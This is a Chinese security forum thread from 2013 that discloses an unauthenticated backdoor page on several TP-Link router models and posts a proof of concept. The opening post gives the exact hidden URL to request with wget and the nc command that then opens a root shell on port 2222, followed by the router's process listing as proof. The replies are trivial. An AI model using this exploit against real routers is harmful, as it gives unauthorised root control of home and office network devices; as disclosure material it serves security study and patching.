查看: 15095|回复: 3

TP-Link路由器后门

[复制链接]
  • TA的每日心情

    2017-6-22 13:45
  • 签到天数: 44 天

    [LV.5]常住居民I

    发表于 2013-10-21 07:50:42 来自手机 | 显示全部楼层 |阅读模式
    TP-LINK部分型号的路由器存在某个无需授权认证的特定功能页面(start_art.html),攻击者访问页面之后可引导路由器自动从攻击者控制的TFTP服务器下载恶意程序并以root权限执行。攻击者利用这个漏洞可以在路由器上以root身份执行任意命令,从而可完全控制路由器。目前已知受影响的路由器型号包括: TL-WDR4300、TL-WR743ND (v1.2 v2.0)、TL-WR941N。 其他型号也可能受到影响。这些产品主要应用于企业或家庭局域网的组建。
    POC:

    代码:
    root@secu:~# nc 192.168.0.1 2222
    (UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
    root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
    Connecting to 192.168.0.1:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [text/html]
    Saving to: "start_art.html"

        [ <=>                                   ] 426         --.-K/s   in 0s

    2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]

    root@secu:~# nc 192.168.0.1 2222
    ps
      PID  Uid     VmSize Stat Command
        1 root        404 S   init
        2 root            SW< [kthreadd]
        3 root            SW< [ksoftirqd/0]
        4 root            SW< [events/0]
        5 root            SW< [khelper]
        6 root            SW< [async/mgr]
        7 root            SW< [kblockd/0]
        8 root            SW  [pdflush]
        9 root            SW  [pdflush]
       10 root            SW< [kswapd0]
       17 root            SW< [mtdblockd]
       18 root            SW< [unlzma/0]
       71 root       2768 S   /usr/bin/httpd
       76 root        380 S   /sbin/getty ttyS0 115200
       78 root        208 S   ipcserver
       82 root       2768 S   /usr/bin/httpd
       83 root       2768 S   /usr/bin/httpd
       86 root        732 S   ushare -d -x -f /tmp/ushare.conf
       92 root        348 S   syslogd -C -l 7
       96 root        292 S   klogd
      101 root            SW< [napt_ct_scan]
      246 root        348 S   /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
      247 root        204 S   /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
      251 root        364 S   /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
      286 root       2768 S   /usr/bin/httpd
      299 root       2768 S   /usr/bin/httpd
      300 root       2768 S   /usr/bin/httpd
      305 root       2768 S   /usr/bin/httpd
      307 root       2768 S   /usr/bin/httpd
      309 root       2768 S   /usr/bin/httpd
      310 root       2768 S   /usr/bin/httpd
      389 root       2768 S   /usr/bin/httpd
    回复

    使用道具 举报

    该用户从未签到

    发表于 2013-10-22 20:24:04 | 显示全部楼层
    {:soso_e100:}
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-8-9 11:41
  • 签到天数: 86 天

    [LV.6]常住居民II

    发表于 2015-9-4 20:52:39 | 显示全部楼层
    完全看不懂
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-7-18 16:57
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2017-4-20 22:17:53 | 显示全部楼层
    来来来来点金币
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-27 03:49 , Processed in 0.018987 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部